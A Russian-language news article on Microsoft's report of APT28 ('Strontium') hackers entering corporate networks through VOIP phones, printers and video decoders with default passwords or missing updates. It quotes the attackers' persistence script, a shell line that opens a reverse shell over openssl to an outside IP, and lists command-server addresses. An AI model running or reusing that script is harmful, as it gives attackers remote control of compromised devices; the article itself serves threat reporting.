Microsoft рассказала об атаках русских хакеров на корпоративные сети через устройства «интернета вещей»
Целью стали VOIP-телефоны, офисные принтеры и видеодекодеры.
Специалисты Центра анализа угроз Microsoft обнаружили атаки на корпоративные сети через устройства «интернета вещей» со стороны группировки Strontium. В некоторых случаях хакерам даже не приходилось ничего взламывать: достаточно было ввести заводские пароли.
В Microsoft обнаружили как минимум три случая подобных атак. Злоумышленники пытались получить доступ к внутренней сети через VOIP-телефон, офисный принтер и видеодекодер. В двух случаях оказалось достаточно ввести заводской пароль, а на третьем устройстве не было установлено последнее обновление безопасности.
Устройства использовали в качестве точки входа. Через них хакеры проникли в сеть и начали сканировать её в поиске других незащищённых устройств с учётными записями с высокими привилегиями.
После получения доступа к каждому из устройств злоумышленники устанавливали скрипт для сниффинга (перехвата) трафика в локальной сети. При перемещении между устройствами хакеры также внедряли скрипт для укоренения в системе.
—contents of [IOT Device] file--
#!/bin/sh
export [IOT Device] ="-qws -display :1 -nomouse"
echo 1|tee /tmp/.c;sh -c '(until (sh -c "openssl s_client -quiet -host
167.114.153.55 -port 443 |while : ; do sh && break; done| openssl
s_client -quiet -host 167.114.153.55 -port 443"); do (sleep 10 &&
cn=$((`cat /tmp/.c`+1)) && echo $cn|tee /tmp.c && if [ $cn -ge 30 ];
then (rm /tmp/.c;pkill -f 'openssl'); fi);done)&' &
--end contents of file--
В Microsoft выяснили, что злоумышленники управляли устройствами с помощью удалённого сервера с IP-адресов 167.114.153.55, 94.237.37.28, 82.118.242.171, 31.220.61.251 и 128.199.199.187. Специалисты считают, что хакеры связаны с группировкой Strontium («Стронций»), также известной как Fancy Bear и APT28.
Так как атаки на устройства «интернета вещей» Microsoft заметила на ранних стадиях, специалисты не установили конечную цель хакеров. Как отметили в компании, только за последние 12 месяцев сотрудники разослали 1400 уведомлений об атаках Strontium по всему миру. Большая часть целей относилась в государственной, IT, военной, оборонной, медицинской, образовательной и инженерной областям.
#хакеры #атаки #microsoft #новости